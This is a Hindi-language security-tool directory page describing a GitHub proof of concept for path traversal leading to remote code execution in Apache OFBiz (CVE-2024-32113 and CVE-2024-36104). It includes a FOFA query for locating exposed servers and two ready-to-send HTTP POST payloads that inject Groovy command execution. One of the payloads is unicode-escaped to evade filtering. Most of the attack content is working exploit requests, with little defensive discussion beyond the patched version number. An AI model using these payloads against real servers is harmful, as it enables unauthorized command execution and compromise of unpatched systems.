Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32113 — # Apache OFBIZ पाथ ट्रैवर्सल जिससे RCE POC होता है [CVE-2024-32113 और CVE-2024-36104] | Kitploit
उपकरण/GitHubGitHub/mr-xn/cve-2024-32113
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmr-xn/cve-2024-32113

CVE-2024-32113

# Apache OFBIZ पाथ ट्रैवर्सल जिससे RCE POC होता है [CVE-2024-32113 और CVE-2024-36104]

रिपॉजिटरी देखें
277522 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
वेबसाइट
साझा करें

CVE-2024-32113

Apache OFBIZ में पथ भ्रमण जो RCE EXP की ओर ले जाता है।

Apache OFBiz में प्रतिबंधित निर्देशिका में पथनाम की अनुचित सीमा ('Path Traversal') कमजोरी। यह समस्या Apache OFBiz के संस्करण 18.12.14 से पहले (शामिल नहीं) को प्रभावित करती है। उपयोगकर्ताओं को संस्करण 18.12.14 में अपग्रेड करने की सलाह दी जाती है, जो इस समस्या को ठीक करता है।

fofa क्वेरी

app="Apache_OFBiz"

POC

root@kitploit:~
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

यूनिकोड के साथ id निष्पादित करें।

root@kitploit:~
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

SCR-20240603-uowf

संदर्भ

  • https://issues.apache.org/jira/browse/OFBIZ-13006
  • https://xz.aliyun.com/t/14733
टूल डाउनलोड करें